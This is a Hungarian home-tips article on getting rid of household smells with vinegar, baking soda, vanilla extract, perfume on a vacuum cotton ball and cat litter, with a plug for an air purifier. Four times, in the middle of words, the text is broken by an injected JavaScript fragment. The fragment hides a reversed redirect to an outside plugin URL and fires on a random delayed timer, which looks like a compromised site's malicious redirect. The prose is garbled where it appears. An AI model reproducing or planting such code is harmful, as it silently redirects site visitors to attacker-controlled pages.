Mai cikkünkben hoztunk néhány olyan praktikát, amelyeket, ha Ön is kipróbál, a kellemetlen szagokat egyszerűen felváltják a könnyed, természetes illatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok.

Professzionális megoldás szagtalanításra:

NOVAERUS levegőfertőtlenítő

Bővebb információ itt található:

NOVAERUS

Szagtalanítás

Házi Prakatikák szagtalanításra:

1. Vegye fel a harcot ecettel az erős, makacs szagok ellen

Amikor ez az anyag szóba kerül, akkor sokaknak inkább a szúrós szaga, mint a szagtalanító hatása az, ami eszükbe jut. Pedig nagyon hatékony ebben a szerepkörben is. Természetesen, mivel savról van szó az anyagok védelme érdekében vízzel hígítva kell használni. 2:1 arányban

Milyen szagok ellen hatékony?

• cigarettafüst

Hogyan alkalmazzuk?

Annak függvényében, hogy mennyire erős a szag, töltsen meg több tálkát ecettel, és helyezze el őket a lakás különböző pontjain. Bár az ecet illata kissé irritáló, hamar semlegesíti a dohányzás miatt létrejött füstszagot, ezt követően pedig hamar elszáll.

• lefolyók szagtalanítására

Hogyan alkalmazzuk?

Ha nincs kedve vagy ideje hetente takarítani a WC-t, mégis szeretné, hogy illatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos és tiszta legyen, öntsön két pohár ecetet a WC-kagylóba.
Öntsön a lefolyóba 2 dl ecetet, erős vízsugárral nyomja bele a lefolyócsőbe, majd hagyja állni 30 percet!

• égett szagok ellen

Alkalmazás módja:

A szag intenzitásától függően egy vagy több tálkát töltön fel ecettel, és tegye a konyha vagy a lakás különböző pontjaira. A szagok hamarosan eltűnnek.

2. A jól ismert szódabikarbóna szagtalanító hatásáról:

Ez a régóta használt anyag remekül szagtalanít, ráadásul könnyen használható. Nem kell mást tenni, mint az anyagra szórni, jól beledörzsölni, majd megvárni, amíg hat – ez csupán pár percet vesz igénybe majd alaposan kimosni.

Íme, egy másik alkalmazási mód:

Tegyen egy tálkába, és rakja közel a szagok forrásához, naponta cserélje egészen addig, míg az összes kellemetlen szagot magába nem szívja!

3. Vaníliakivonat

Régóta alkalmazott ingatlanközvetítői trükk: csepegtessen egy-két csepp vaníliakivonatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot egy villanykörtére, kapcsolja fel a villanyt, és a házat máris betölti a frissen sült sütemények kellemes illata.

4. Parfüm

Egy vattalabdát itasson át a kedvenc parfümével, és tegye bele a porszívóba. Mikor a családi és baráti látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}togatások után felporszívózik, az illat szétárad a lakásban, így dupla nyeresége lehet ezzel a praktikával.

5. Macskaalom

Alkalmazás:

Öntsön egy tálka macskaalmot, helyezze el a lakás különböző pontjain! Néhány nap múlva cserélje le, amíg a szag teljesen meg nem szűnik.
A jó minőségű termékek majdnem ugyanazt a hatást érhetjük el, mint a szódabikarbónával.

Miért jobb, mint a szódabikarbóna?

A macskaalom, amellett, hogy a szagokat szagtalanít, a nedvességet is magába zárja, így egy dohos levegőjű szobával csodákat tehet.